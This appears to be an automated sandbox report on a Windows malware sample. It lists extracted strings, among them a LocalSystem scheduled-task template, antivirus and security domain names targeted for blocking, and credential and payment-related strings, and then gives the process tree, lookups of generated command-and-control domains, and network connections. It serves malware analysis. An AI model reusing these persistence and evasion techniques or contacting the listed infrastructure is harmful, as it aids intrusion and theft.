LoadLibraryA
Module32Next
LocalFree
WriteProcessMemory
SwitchToThread
FileTimeToDosDateTime
GetFileSize
SystemTimeToFileTime
GetLocalTime
LocalAlloc
GetFileType
GetFileInformationByHandle
FindFirstFileW
FileTimeToSystemTime
CreateFileW
lstrlenW
FindNextFileW
KERNEL32.dll
CharUpperA
FindWindowA
GetSystemMetrics
SetCaretBlinkTime
SetThreadDesktop
GetThreadDesktop
ReleaseDC
GetShellWindow
GetWindow
DestroyIcon
SetClipboardData
OpenClipboard
GetDesktopWindow
EmptyClipboard
GetIconInfo
RegisterWindowMessageA
SendMessageA
WindowFromPoint
DrawIcon
CreateDesktopA
GetTopWindow
CloseClipboard
SendMessageW
IsWindowVisible
IsWindow
GetLastActivePopup
PostMessageW
IsIconic
MapVirtualKeyW
IsRectEmpty
GetClassLongA
GetWindowThreadProcessId
MapWindowPoints
PostMessageA
GetMenuItemInfoA
SetWindowPos
SendMessageTimeoutA
GetWindowLongA
GetAncestor
GetWindowInfo
GetParent
GetWindowRect
GetSystemMenu
DefWindowProcW
EndMenu
HiliteMenuItem
DefMDIChildProcA
GetCursor
GetMenuItemCount
DefMDIChildProcW
DestroyCursor
DefWindowProcA
GetMenuState
CopyIcon
TrackPopupMenuEx
GetMenuItemRect
GetMenu
MenuItemFromPoint
GetSubMenu
SetKeyboardState
GetMenuItemID
OpenDesktopA
GetUserObjectInformationA
PrintWindow
WindowFromDC
SetLayeredWindowAttributes
EnumChildWindows
RedrawWindow
GetWindowRgn
SetClassLongA
SetWindowLongA
GetScrollBarInfo
MoveWindow
DialogBoxIndirectParamA
SetWindowTextA
ShowWindow
EndDialog
GetDlgItem
CreateWindowExA
GetWindowTextLengthA
GetClientRect
LoadIconA
AttachThreadInput
DestroyWindow
wsprintfA
PtInRect
GetFocus
RealChildWindowFromPoint
GetClassNameA
GetCursorPos
GetWindowTextW
GetOpenClipboardWindow
GetActiveWindow
GetWindowTextA
GetGUIThreadInfo
GetKeyboardState
ToAscii
FindWindowW
DispatchMessageW
PeekMessageW
TranslateMessage
MsgWaitForMultipleObjects
GetWindowDC
USER32.dll
GetDeviceCaps
CreateCompatibleBitmap
CreateCompatibleDC
SelectObject
DeleteObject
GdiFlush
GetDIBits
CreateDIBSection
DeleteDC
CreateRectRgn
OffsetRgn
SelectClipRgn
SetViewportOrgEx
GetViewportOrgEx
BitBlt
GetClipRgn
GetObjectA
CreateFontIndirectA
GDI32.dll
RegQueryValueExA
RegOpenKeyExA
GetUserNameA
RegCloseKey
RegSetValueExA
RegFlushKey
RegDeleteValueA
RegEnumKeyExA
RegNotifyChangeKeyValue
OpenProcessToken
GetTokenInformation
RegDeleteKeyA
ADVAPI32.dll
memcpy
memset
_except_handler3
>?456789:;<=
 !"#$%&'()*+,-./0123
jHqA}
kdzbeO\
iLA`rqg
@l2u\E
a=-fAv
\cQkkbal
eLXaMQ:t
jiCn4Fg
c;d>jm
i]Wbgeq6l
8ROggW
A`Ugn1yiFa
fo%6hRw
[&wowG
eibkaEl
`MGiIwn>Jj
)WTg#.zfJa
h]+o*7
;3+#>6.&
'2, /+0&7!4-)1#
O/o_?
$Id: dbfopen.c,v 1.48 2003/03/10 14:51:27 warmerda Exp $
Desk_%u%x
-xFS]
!nuca?B
h2A co*SSFQ37
JD4?'
gTC/L7dkto
;EOUhq_
S@9':] "^znztV=
'h?c ,Z
D"N47T0h|-
qX_Ro.)}eM2UY.
[rPfmV8Q
t[jq+a:U
k"_}1I{D7
n3r4Nnf
||~hYk
.Y+t~2MlUj
sI)79B
MSCTF.Shared.MAPPING.%x
.current
MSCTF.Shared.MUTEX.%x
0@0G0u0000000000
1,1=1J1U1d11111111#2@2G2s2}22222222'313;3n3x333333
4-4i444444&5x5555555
6C6|666666666666666
767F7L7x77777777
8 8&8_89!:J:U::
K88888s9999&:q::::
;4;v<======
0192222222222
3,333=3D3a3q3v33333333
4(4/444444444
5!5555555555
6)6W6^6h6666666
7+727<7F7Z7`777
8'8,8;8D8W8f8o8|8888888888
9'9D9M9U9[9`9k9r9{999999999999
:6:P:W:e:::::::;;;
<-<6<R<c<j<<<<<<<*=0=G=b=s=z======
>">^>e>>>>
?"?(?1?J?b???????????????
0"0L0\0p000
1 1'1_1r111111111
202@2O2_2e2q22222
3)3b3i333333333$4=4[4d4444444
5g5n55555
6F6X6j6z66666666
7!7I7w77777777
8&868V8c8j8x88889
:0:7:H:r:y::::::
;";q;;;;;;
<g<z<<<<<<<
=c=v=======[>b>s>>>>
? ?'?0?9???Q?~?????
!0(090J0Y000000&1-1>1O1^11111
2.252F2S222222G3Z3333333>4Q4{444444455H5r5y5555555555
6G6Z666666
7,7X777777#8_8888888
9 909\9999999!:(:\:b:m::::
;*;0;9;O;\;{;;;
<%<5<J<n<<<<<<4=C=X=e=|========
>&>2>>>J>V>b>n>z>>>>>>>>>>
?"?.?:?F?R?^?
0.0R0]0r0|000000000000000
1 1&1.181@1I1S1e11111
3X3_3333333
4"4:4U4^4v44444$575b5w555555*666
7$71777
88>8E8O8V8e8
8888888U9\9|9999
:0:>:::::
;\;c;;;;
<!<'<B<f<p<<<<<
0040E0K0P0000000051{1111111
2H2f222222
3*313Q3b3r33333=4D4k4|44444`5g5555555
6/6>6L6S666666
7'7.7J7Q7~77777777#8H888
9D9999
:l:}:::/;6;u;4<x<
<<<<<<<
=#=0=a=f=u=========
>J>Q>[>v>{>>>>>>>>
??)?/?W?e?o??????????
0'0,060?0J0Q0V0t0000000
1+151?1X1^1n1x111111111
2*282Y2h2s2x222222
3 343<3A3F3L3S3u3333333333333333
4)4.464C4^4g4p44
5"5R5555555555 6'6N6X666R708A8M8k8p888U9
:%:1:G:M:S:[:
<1<9<D<N<T<\<b<k<q<z<<<<<<<<<<<<<<
=7=A=I=O=\=m=====(>2>;>A>T>Z>b>q>y>~>>>>>>>>
?.?B?I?N?f?w?}????????????
0)0/080W0d0o0u0000000000000
1#1(1;1E1L1R1^1e1k1r1x1
111112222
3)353>3D3R3|3333333
4"454D4c4i4p4z444444444
5$5*50585?5E5_5y555555
63696@6J6W6i6o66666666666666#7-747>7I7X7888
9;9L9S9\9o9z99999999
:#:F:`:s:z:::::::
;-;:;J;Y;a;p;};;;;d<h<l<p<t<x<<<<<<<
=8=?=F=_=l======
>(><>E>g>t>x>|>>>>>>><?B?H?a?l?w????????????
0<0D0Q0\0c000000
131L11111
2+2222U3h3
4$4(4,4044484<4@4D4H4j4r44444444
5j5t5555
646S6g6{66665888888
9/9<9N9f9s999999
:.:7:=:G:M:w::::::::::::
;$;*;C;T;a;s;{;;;;;;;;;;;;;;;
<;<J<b<o<<<<<<<
=;=J=b=o=======
>;>J>b>s>>>>>>>
?;?J?b?o???????
0;0J0b0s0000000
1%1.191H1\1c1k1r1z1111111111
2 2<2K2h22222
3%393?3J3U3a3h3}333333333
4(454H4U4h4u4444444445/5E5U5u55555555555
6%6*606R6Y6k6z6666666666
7#7-72787b7i7}7777777+818H8\8888888888
9 9I9h99999
: :Y:^:d:i:s:y:
:::::::::::::
; ;);6;E;S;Y;c;};;;;;;;;;;;
< <(<5<:<@<I<N<T<d<s<<<<<<<<<<<<<<
='=7=<=G=W=\=g=w=|=============
>'>7><>G>W>\>g>w>|>>>>>>>>>>>>>
?'?7?<?G?W?\?g?w?|?????????????
0 00050@0P0U0`0p0u000000000000
1!1F1T1^1n1u11111
262V2x222222222
3.343:3?3D3W3f3y333333
484A4T4d4x44444444
55)505H5Y5d5j55555555555
6-686H6666666666
7*7@7F7f77777777
8-8C8M8S8g8888888P9i9
:1:K:f::!;;;;;
<3<E<L<W<<<<+=9=E=R=s=z=====
>#>*>9>N>>>>
?,?9?@?O?d???
>0t0000000
11c1l1r1z11111111111
2%2+2D2J2R2Z2i2n2t22222222
3e3333333333
4!4E4R4b4u4444444444
5+595F5L5U5[5`5m5z55555555555
6"6/6>6J6O6Y6`6g6u6666666666
7;7B7I7]7r7777777777777
8&8+83888Z8e8k8p8{8888888888
9'929<9K9^9q9z9999
:#:':H:q:::::::
;#;4;N;q;{;;;
<,<5<?<E<g<q<{<<<<<<<<
=%=:=r========
>$>8>>>T>{>>>>
?-?T??????
000000000
11111&222T2\2222222234444
5525B5U5e5k5w555555588799::;;;;I<<p==/>>>>F?c?u??
00f1m11
2P2W2c2j22223444p5w55555
6"6D6f6667777/8R8j888
969s9~99999
; ;D;7<k<~<<<<<
=#=.=:=?=J=V=[=f=r=w=========
>;>B>>
?'?e?q??????
C0u000000
1Y1p11111111112$2?2F22222
3S3]3334l44$5+585?5X555555l6t6666
7D7o777.8~88888888
9)9J9]9x99
:&:M::::::
;6;];;;;;o<{<<<'===c===L>>>
??/?f?l?{???????????????
0#0/040?0K0P0[0g0l0000
1$1)1U1Z1s1111111111
2E2J2222273F3\3b3k3x33333
4>4E4t444
6*616?6R6j6p6w666666667H7X7a7h7x7777777778
9#9a:h::::T<[<h<o<<<
=y=======
>8>N>>>>
?5?E?Y?i?x????????
0.090E0Q0000002181B1_1f1m1|1111111111
2"252O2U2s222222
3%3+3^3i3n3333
4c44444
5(5k5}55555>6r666666666 7.747N7S7777
8i88888
9R9c9s9999999999
:Q:`:s:::::
;,;2;;;;;;
<8<?<G<m<t<z<<<<<<<<<<<
=p=t=x=|====[>p>>>>>>
?@??????
:0J0e0w000000
1*1w1~11111111111111
2;2B2H2R2X2h2p2v2|22222
3(3C3q3x333333333
4o444444
5Q5]5m555555555-6h666666
7\777777748A8G8M8R8d8{88888-949[9d9999
:n:s:::::>;C;;;;;;7<D<W<d<n<t<z<<<<<<<<<<
=3=:=g=s=======
>->4>[>a>>>>>
?^?e??????
*060000000&1Z1f1112292\222
3<3333/464t4444!5y555555+676G6O6U6`66
7T77777777
8(868;8M8{88888,9M9]9l9|9999999994:t::::::
;?;L;[;e;t;;;
<,<g<x<<<<<<
=7=F=Y=v={====
>@>h>o>>>>>>>>>>%?+?D?K?[?o???????
0*0A0G0V0h00000%111A1g1t111111111111111
2!2i2n2v2}22222222222222
3&333?3D3O3[3`3k3w3|333333333333
4&42474C4g4s444444444
5"5'525>5C5N5T5Y5^5c5{555555555555
6*6<6L6S6l6v66666
7Z7`7h77777
8-858:8M8T8^8{8888888
9Z9`9h9q99999
:#:,:d:z::::::::
;4;J;Q;_;p;;;;;;;;;
<%<z<<<<<<<<
=4=A=G=O=d=o=====
>+>@>F>e>n>>*?0?8?P?h??????
01060A0{000000
1z11111111
232T2a2g2o222222222
3.3C3J3T3^3c33333333*40494B4g4p4444444i5p555555555
6@6H6]6u6666666+777G7V7c7777777
8 8-878J8R8[8e8o88888888888
9'9,9B9L9j9{99999999
: :6:T:e:k:w:::::::::::
;$;:;P;f;|;;;;;;
<,<B<m<u<
=F=Q=|======
>)>T>_>>>>>>
?,?7?b?m?????
010J0T0j0|000000
1"121Q1`1y1111111111
2,262N2_2g2t22222222222
3;3I3_3s3y3333333
4T444444
5 5&5R5555555
6 6166666
7N7q777777777
8'8J8P8e8k88888888 9'9,939j9999999
:":D:K:U:_:e:q::::::::::
;B;|;;;;;
<<<]=e===
?L?d???????
0-0S0a0p0w000
3G3Z3`333333
4#4+44
525D5I5P5]5k5r555555
6+626Z6`6h666666666
7:7@7H7p7z777777777
8>8R8d8i8p8}8888888
9 9-92999Z9`9h999999::::::
; ;-;2;9;Z;`;h;;;;;;;;;;;
< <(<I<S<k<~<<<<<<<<<<<
=%===N=T=`=p======D>^>e>>>
?5?O?v?????
0/0V0000
1+1B1i1111
2/2F2m22222222
3'3,373C3H3S3_3d3o3{3333
4?4F4L4r44444<55555555
6k6w6~66666
8 8,8N8h8888888
9!969<9B9P9`9l9
999999999E:^:m::::::::::
;);W;^;h;;;;;;;
<+<2<<<F<f<l<y<<<<<
=4===B=T=u=~======
>)>6>V>[>x>
>>>>>???
0z071L1o1111111
22%2,2H2Q2V2\2g2p2v2222222
3I3P3h3t3{33333334>495V5]5555s6z66
:::;;;;;;;;"<3<9<><w<<<<<
=#=4=:=?=
=========->3>;>l>>>>>>>>>>
?"?3?9?>?????????
060B0P0X0a0g0n0s00000000000000
1+191A1J1P1W111111111
2!222R2f2l2q22222222
3 3'3-333J333333333
4'4;4M4R4X4]4b4444444$575=5B5y55555555555
6"6(616M6U6f6m6r6w6}6666
7"73797>7}777777777
8$8*8J8P8X8m8w8
888888888>9R9c9i9n999999999
:#:):.:g:q:y::::::::::-;3;a;g;n;x;;;;;;;;;!</<4<A<I<O<l<~<<<<<<<<<<
=%=Y=r=========
>[>b>h>p>>
*01000K1Q1Z1c11
2`2i2w22222222222
33333333
4,4@4q4w4
5M5S5[5w5555555
6"6X6c6z666666666666!7&757E7[7s77777777777
8 8&8.8R8`8f8k88888888
9.9M9_9p999999999
: :3:r:::::
;/;<;;;;;;;;h<<<<
=#=?=j=w========
>!>(>;>A>>>>>>>
?&?-?@?F???
!0U0000$11171R1`1f1k111111111
2$2:2@2H2W2`2j2p2222222222
363>3M3T3j3p3x3333333333
4#4*4=4D4L4f4n4}44444444444
595L5T5c5j5}55555555555
6#61676<6p6}66666666666
7"717;7E7K7b7p7v7{777777777
8-848J8P8X8a8p8y88888888
9!9*939B9S9Y9^99999999::@:I:R::::::
;!;/;>;M;Z;f;r;;;;;;;;;;
</<7<D<X<i<}<<<<<<<
=$=)=0=]=f=======
> >*>B>S>Y>r>y>>>>>
?#?)?/?<?H?V?b?t????
0@0J0b0s0000000
1'1.1;1S1]1d1i1x111
2!2j2}2222
3%323@3R3`3f3k33333333*404W4e4k4p44444444*50555
6c6v6|66666666
7*7R7c7i7n77777777
838M8W8h8o888888888
979@9N9_9f9{99999999%:2:=:G:L:e:v:::::::::
;E;X;_;l;;;;;;;;;;
<*<0<8<M<Z<_<q<<<<<<<<
= =(===J=q=v========@>I>W>h>o>>>>>>>>>>R?X?e?k?p?~????????????
0$0.0Z0m0|0000000000
1"1(121D1L1V1`1q1x11111111
2'222<2R2t2y2
2222222!3'3/3B3[33S44444444
5'535A5I5R5X5_5d5z55555555555555
6)616:6@6G6L6[6b6k6{666666666
7?7F7S7\7d7u7|7777777
8G8P8^8o8v88888888859B9M9W9\9u99999999999
:<:S:X:h::::::
;4;D;Y;i;;;;;;;
<(<-<8<=<H<M<X<]<h<m<x<}<<<<<<<
=5===N=U=j=p={=====
>&>->>>>>>>>>>
?2?F?L?Q?????????
0*0|000000000
14191?1D1I1
1111111
2+222e2v2222222222
3R3c3i3n333333333
4C4Q4W4\4444444444
5,5?5i5z5555555
6H6Y6l6{666666666
7-727B7R7^7r7}777777
88&8;8A8_8p8w8}88888
9+919W9b9l99999999
:S:]:e:v:}:::::::::;@;L;;;;;;;
<2<8<A<\<i<<<<
="=3=:=z======
>G>P>^>o>v>>>>>>>>>Y?f?t?|????????
0 0'090J0l0q00000000
1$1)1/14191k11111111
2N2V2`2x222222
3'383?3Z3`3r3333333
4!4(4:4K4j4r44444444444495>5M5\5r5555555/696A6R6Y6f6~666666666
7+7C7U7Z7`7e7j7777777
8$8)808]8r8888888
9)989B9L9d9u999999
::&:;:A:_:p:w:}:::::
;";3;8;>;C;H;k;|;;;;;;;;
<*<0<8<M<Z<o<y<<<<<<
="=5=;=B=u=~==========
>2>C>I>N>>>>>>>>>>
?0?_?j?v??????
0/060K0Q0o0000000
1/1Q1\1f1|1111111
22.242B2I2R2[2x2
22222222
3(30393H3[3`3i3s3"43494>4y444444444
5%5,535s5}55555555"6>6[66666666
7x7777
8$828C8I8N88888888888B9r999999999
:::::::
; ;+;8;b;s;y;~;;;;;
<%<,<><O<X<d<t<<<<<<
==&=;=A=_=p=w=}=====
>>A>L>V>l>>>>>>>>>
?-?2?8?=?B?r?????????
0/0@0G0M0S0j000000
1&1<1^1c1i1n1s11111
2 2G2L2T2_22222:3@3I3R3f33333333"434:4z444444444
525E5L5S5555555555B6^6{66666
7-7:77777777
8O8U8]8r888888)969D9L9U9^9{999999999":5:<:C:w::::::::::
;';?;P;i;;;;;;;;;
<D<b<s<y<~<<<<<<?=N=b=s=y=~===
>j>y>>>>>
?#?+?T?e?k?p??????
0<0A0P0e0{00000000
111D1b1s1z1111
2!22292F2^2i2r2y2222222
323<3F3P3a3h3z3333333
4 4%4*4g4~44444
6+626\6b6r66666
7K7k7r777777718W8]8c888809B9O9U9^9q9
99999#:V:d::::::
;F;b;h;~;;;;;;
<D<K<o<<<<
=E=L=p====A>P>>>>>
00%0.050>0F0i0u000000
1!1k1v1111111=222
3!3J3[3|333333
4?4E4{44444;5W5e55555*6b6s666666666
7H777:::
;M;`;o;;;
6'69666
789M::;;
0L0Z0h0v011c23
3)3?3U3k333333
434=4C44445V6p66
7^777777Q8888
979E9W9999::
;W;^;;;
<#<2<<==*>?>L>
M1T182?2L2S2Y2e2u222T3k3z33333
44/4;4K4P4444
595B5H5a5
55555%6;6_6n6666
99"::::;;;*<4<><H<R<\<f<p<<)====1>t>|>>>>>>>>>>>>>>>>
?"?(?0?7?|?????
1T11422
3(4}44Q5a5566v8a99/:: ;;;s==k>>>>
)0111111111111
2@2S2e2233<4D444^666
7;7V7n7t7
777777X8e8
:T::::
;/;5;B;K;T;Z;g;p;
>:>r>>>>>>>
S0Z0`0k0w0
00000000
111D1Y1111Z222
33*4j44444
66666&7d7/8\8u888
99::K;j;s;;;;$>>
1-2222L3Q3]3d334I6666j77777
8!81888d993:A:k::y;;;W<{<<<4=a====
>7>>>d>>>l??
0r00D1W1111
3,3u333333333333333
4H4%55557,99F::V;;[<|<<<
=B============
1122i3s3355f6666666
99O;;<<2=f===$>>>
I0'1:1T1e1194j4~444
5'5555u66B7Y7`77848G888
9)9b99999999:::1;F;[;;;;0<E<<<
>->:>v>>>>>>>S?Z?`?k?w?
0*020F0q0w0
101611B2d223344559:F:T;a;b<<
122C2B3f37
88$9299B:c:/;;9<J>>
0#112-3555566666
7#7w7748-999#;J=
4:::::::::::
;P;c;u;;<<L=T===??????????
00s222222222233b5555555555v666;X<<9==>>>>>>>
S0d0m0~000000000000
11(161?1M1V1d1i33 4'464@4T4c4r4|44444444
4i445W6666#7&8585<==
%4N4]477
0(060B0M0
1>1h1111
2 2.2722222333333}45==x>>>>>>;?I?q?z????
1*161111122
35:e:::
;I;U;;;;;
<4<d<<|====
?j?t???
66H7V7d7r777
8@8I8x888J9999
:k:u:::l;;;;;
2%33333
4j4~44444$55<6F6Z6f666667*848B8K8>>5?C?Q?_????
0$0-0\0s00>1111
2|222233
4E:u::
;;K;W;;;;;
<3<x<<====<>F>[>d>c?????
1E11111
3>33`4j4z4444
55I6S6a6j67
8888888O9c99999
::0;:;J;V;;;;;<
=#=1=:=>>]?k?y????
030R0\0000g1
2+272222233333u55
6+696H6v6666
7K7c77'88888O9Y9k9t9B::::: >
{11w33)5D5R556779H<=?
4181<1@1D1H1L1P1T1X1\1`1d1h1l1p1t1x1|11111111111111111&202@2>>
6%666U7g7<<<<<<
=E=p===>??????????
033o5v5558888949:9B9
;,;8;D;P;\;h;t;;;
======
5,5@5H5L5P5T5X5\5`5d5h5l5p5t5x5|555555555555555??????????????????????
0 0$0(0,0004080<0@0D0H0L0P0T000
12253s335
$Id: dbfopen.c,v 1.48 2003/03/10 14:51:27 warmerda Exp $
K;j;s;
8 2003/03/10 14:51:
0000000
00000EN1d1\
99O;;<<2=f===$>>
K;j;s;
8 2003/03/10 14:51:
0000000
00000EN1d1\
99O;;<<2=f===$>>
K;j;s;
<2=f=E
Y,&tqa
}YL@}A
8 2003/03/1
KPKPKPv
K;j;s;
K;j;s;
K;j;s;
;j;&ts
j;s2=f
;j;&ts
PK;,c/
DS69D'
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
OFFSHORE
w.qiwi.ru
phone3
DS69D'
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
OFFSHORE
w.qiwi.ru
phone3
DS69D'
pass.txt
Local\{EAF339BF-89ea-4fe1-9e
iWindows Explorer
cmd.exe
<Principals>
<Principal id="LocalSystem">
<UserId>S-1-5-18</UserId>
<RunLevel>HighestAvailable</RunLevel>
</Principal>
</Principals>
<Actions Context="LocalSystem">
<Exec>
<Command>%s</Command>
</Exec>
</Actions>
</Task>
<!--00-->
\\?\globalroot\systemroot\system32\tasks\
task%d
<Actions
mavast.com
kaspersky
eset.com
antivir
virustotal
virusinfo
z-oleg.com
kltest.org.ru
trendsecure
anti-malware
.comodo.com
google.com
#+3;CScs
tdefault
--no-sandbox
serverkey.dat
private
public
\java\
\windows\
SunAwtFrame
SunAwtDialog
MS Sans Serif
iWindows Explorer
cmd.exe
<Principals>
<Principal id="LocalSystem">
<UserId>S-1-5-18</UserId>
<RunLevel>HighestAvailable</RunLevel>
</Principal>
</Principals>
<Actions Context="LocalSystem">
<Exec>
<Command>%s</Command>
</Exec>
</Actions>
</Task>
<!--00-->
\\?\globalroot\systemroot\system32\tasks\
task%d
<Actions
mavast.com
kaspersky
eset.com
antivir
virustotal
virusinfo
z-oleg.com
kltest.org.ru
trendsecure
anti-malware
.comodo.com
google.com
#+3;CScs
tdefault
--no-sandbox
serverkey.dat
private
public
\java\
\windows\
SunAwtFrame
SunAwtDialog
MS Sans Serif

Process Tree

04fd4db1c34dba0f545952c8ae0948b259d7133000e7278034c9f53cf1ef08e4.exe, PID: 2064, Parent PID: 628

default registry file network process services synchronisation iexplore office pdf

svchost.exe, PID: 2228, Parent PID: 2064

default registry file network process services synchronisation iexplore office pdf

ComputerZService.exe, PID: 348, Parent PID: 1684

default registry file network process services synchronisation iexplore office pdf

360TptMon.exe, PID: 1736, Parent PID: 1704

default registry file network process services synchronisation iexplore office pdf

360DrvMgr.exe, PID: 1684, Parent PID: 1412

default registry file network process services synchronisation iexplore office pdf

ComputerZService.exe, PID: 2968, Parent PID: 1684

default registry file network process services synchronisation iexplore office pdf

dll_service.exe, PID: 1472, Parent PID: 2968

default registry file network process services synchronisation iexplore office pdf

dll_service.exe, PID: 1496, Parent PID: 2968

default registry file network process services synchronisation iexplore office pdf

dll_service.exe, PID: 2520, Parent PID: 2968

default registry file network process services synchronisation iexplore office pdf

dll_service.exe, PID: 3036, Parent PID: 2968

default registry file network process services synchronisation iexplore office pdf

dll_service.exe, PID: 696, Parent PID: 2968

default registry file network process services synchronisation iexplore office pdf

DNS

Name Response Post-Analysis Lookup
dns.msftncsi.com A 131.107.255.255
A 131.107.255.255 		131.107.255.255
dns.msftncsi.com AAAA fd3e:4f5a:5b81::1 131.107.255.255
www.bing.com CNAME china.bing123.com
CNAME www-www.bing.com.trafficmanager.net
CNAME cn-bing-com.cn.a-0001.a-msedge.net
A 202.89.233.101
A 202.89.233.100 		202.89.233.101
qetyfuv.com A 44.221.84.105
A 44.221.84.105 		44.221.84.105
lyvyxor.com A 208.100.26.245
A 208.100.26.245 		208.100.26.245
vojyqem.com A 172.234.222.138
A 172.234.222.143
A 172.234.222.138
A 172.234.222.143 		172.234.222.143
qegyqaq.com
gahyqah.com A 162.255.119.102
A 23.253.46.64
A 162.255.119.102
A 23.253.46.64 		23.253.46.64
puvyxil.com
lyryfyd.com
gatyfus.com A 5.79.71.225
A 85.17.31.122
A 178.162.203.211
A 85.17.31.82
A 178.162.217.107
A 5.79.71.205
A 178.162.203.226
A 178.162.203.202
A 178.162.203.226
A 178.162.217.107
A 85.17.31.122 		85.17.31.122
vocyzit.com
purydyv.com
qexylup.com
vowydef.com
pufymoq.com
lyxylux.com
vofymik.com
gacyzuz.com
lygymoj.com
gadyniw.com A 154.212.231.82
A 154.212.231.82 		154.212.231.82
qeqysag.com
gaqydeb.com
puzylyp.com A 99.83.138.213
A 13.248.252.114
A 99.83.138.213
A 13.248.252.114 		13.248.252.114
volykyc.com
pumypog.com
lymysan.com
qedynul.com
ganypih.com
lysynur.com
pujyjav.com
pupybul.com
galykes.com
qekykev.com
qebytiq.com
vopybyt.com
vonypom.com
lykyjad.com
gatyvyz.com
lyvytuj.com
vojyjof.com
qetyvep.com
gahyhob.com
vocyruk.com
lyryvex.com
puvytuq.com
purycap.com
gacyryw.com
lygygin.com
qexyryl.com
pufygug.com
qegyhig.com A 172.67.173.131
A 104.21.30.183
A 172.67.173.131
A 104.21.30.183 		172.67.173.131
lyxywer.com
vowycac.com
gaqycos.com
qeqyxov.com
vofygum.com
puzywel.com
gadyfuh.com
lymyxid.com 3.94.10.34
volyqat.com
qedyfyq.com
galyqaz.com A 199.191.50.83
A 199.191.50.83
pumyxiv.com
lysyfyj.com 69.162.80.54
vonyzuf.com
qekyqop.com
c.pki.goog CNAME pki-goog.l.google.com
A 203.208.50.98 		203.208.50.34
ganyzub.com
lykymox.com
pupydeq.com A 13.248.169.48
A 76.223.54.146
A 13.248.169.48
A 76.223.54.146 		13.248.169.48
vopydek.com
qebylug.com
pujymip.com
gatydaw.com
qetysal.com
vojymic.com
lyvylyn.com
gahynus.com
puvylyg.com
vocykem.com
qegynuv.com
lyrysor.com CNAME gtm-sg-6l13ukk0m05.qu200.com
CNAME zz1985.qu200.com
A 103.150.11.22
CNAME gtm-sg-6l13ukk0m05.qu200.com
CNAME zz1985.qu200.com
A 103.150.11.22
CNAME gtm-sg-6l13ukk0m05.qu200.com
CNAME zz1985.qu200.com
A 103.150.11.22 		103.150.11.22
gacykeh.com
purypol.com
lygynud.com
vowypit.com
pufybyv.com
lyxyjaj.com
qexykaq.com
qeqytup.com
vofybyf.com
gaqypiz.com
puzyjoq.com
gadyveb.com
volyjok.com
lymytux.com
qedyveg.com
pumytup.com
galyhiw.com
lysyvan.com A 104.21.26.151
A 172.67.136.136
A 104.21.26.151
A 172.67.136.136 		172.67.136.136
qekyhil.com
vonyryc.com
pupycag.com A 18.208.156.248
A 18.208.156.248 		18.208.156.248
lykygur.com
ganyrys.com
vopycom.com
qebyrev.com
pujygul.com
gatycoh.com
vojygut.com
gahyfyz.com
puvywav.com
lyvywed.com
qetyxiq.com
puryxuq.com
gacyqob.com
qegyfyp.com
lyryxij.com
qexyqog.com
lygyfex.com
vocyqaf.com
pufydep.com
vowyzuk.com
gaqyzuw.com
vofydac.com
lyxymin.com
qeqylyl.com
lymylyr.com
gadydas.com
volymum.com
puzymig.com
s.ludashi.com A 47.117.77.180 47.117.77.180

TCP

Source Source Port Destination Destination Port
192.168.56.101 49167 13.248.252.114 puzylyp.com 80
192.168.56.101 49171 208.100.26.245 lyvyxor.com 80
192.168.56.101 49176 172.67.173.131 qegyhig.com 80
192.168.56.101 49179 23.253.46.64 gahyqah.com 80
192.168.56.101 49181 44.221.84.105 qetyfuv.com 80
192.168.56.101 49184 154.212.231.82 gadyniw.com 80
192.168.56.101 49182 172.234.222.143 vojyqem.com 80
192.168.56.101 49185 172.234.222.143 vojyqem.com 80
192.168.56.101 49186 104.21.30.183 qegyhig.com 443
192.168.56.101 49190 23.253.46.64 gahyqah.com 80
192.168.56.101 49192 203.208.50.98 c.pki.goog 80
192.168.56.101 49194 13.248.169.48 pupydeq.com 80
192.168.56.101 49195 18.208.156.248 pupycag.com 80
192.168.56.101 49200 103.150.11.22 lyrysor.com 80
192.168.56.101 49202 47.102.103.145 8000
192.168.56.101 49203 47.102.103.145 8000
192.168.56.101 49204 104.21.26.151 lysyvan.com 80
192.168.56.101 49205 104.21.26.151 lysyvan.com 443
192.168.56.101 49211 47.117.77.180 s.ludashi.com 80
192.168.56.101 49212 13.248.169.48 pupydeq.com 80
192.168.56.101 49213 47.117.77.180 s.ludashi.com 80

UDP

Source Source Port Destination Destination Port
192.168.56.101 53179 224.0.0.252 5355
192.168.56.101 49642 224.0.0.252 5355
192.168.56.101 137 192.168.56.255 137
192.168.56.101 61714 114.114.114.114 53
192.168.56.101 56933 114.114.114.114 53
192.168.56.101 138 192.168.56.255 138
192.168.56.101 58485 114.114.114.114 53
192.168.56.101 57665 114.114.114.114 53
192.168.56.101 51758 114.114.114.114 53
192.168.56.101 52215 114.114.114.114 53
192.168.56.101 62361 114.114.114.114 53
192.168.56.101 58985 114.114.114.114 53
192.168.56.101 50075 114.114.114.114 53
192.168.56.101 58624 114.114.114.114 53
192.168.56.101 62044 114.114.114.114 53
192.168.56.101 62515 114.114.114.114 53
192.168.56.101 60330 114.114.114.114 53
192.168.56.101 61322 114.114.114.114 53
192.168.56.101 62306 114.114.114.114 53
192.168.56.101 55142 114.114.114.114 53
192.168.56.101 56111 114.114.114.114 53
192.168.56.101 58005 114.114.114.114 53
192.168.56.101 64558 114.114.114.114 53
192.168.56.101 49986 114.114.114.114 53
192.168.56.101 65527 114.114.114.114 53
192.168.56.101 62324 114.114.114.114 53
192.168.56.101 55457 114.114.114.114 53
192.168.56.101 63148 114.114.114.114 53
192.168.56.101 55773 114.114.114.114 53
192.168.56.101 51209 114.114.114.114 53
192.168.56.101 61491 114.114.114.114 53
192.168.56.101 60789 114.114.114.114 53
192.168.56.101 59504 114.114.114.114 53
192.168.56.101 60395 114.114.114.114 53
192.168.56.101 55469 114.114.114.114 53
192.168.56.101 53131 114.114.114.114 53
192.168.56.101 58818 114.114.114.114 53
192.168.56.101 65012 114.114.114.114 53
192.168.56.101 50445 114.114.114.114 53
192.168.56.101 64590 114.114.114.114 53
192.168.56.101 54987 114.114.114.114 53
192.168.56.101 65496 114.114.114.114 53
192.168.56.101 52014 114.114.114.114 53
192.168.56.101 56171 114.114.114.114 53
192.168.56.101 50365 114.114.114.114 53
192.168.56.101 53520 114.114.114.114 53
192.168.56.101 51770 114.114.114.114 53
192.168.56.101 49587 114.114.114.114 53
192.168.56.101 64679 114.114.114.114 53
192.168.56.101 56992 114.114.114.114 53
192.168.56.101 60222 114.114.114.114 53
192.168.56.101 60720 114.114.114.114 53
192.168.56.101 60534 114.114.114.114 53
192.168.56.101 61947 114.114.114.114 53
192.168.56.101 65312 114.114.114.114 53
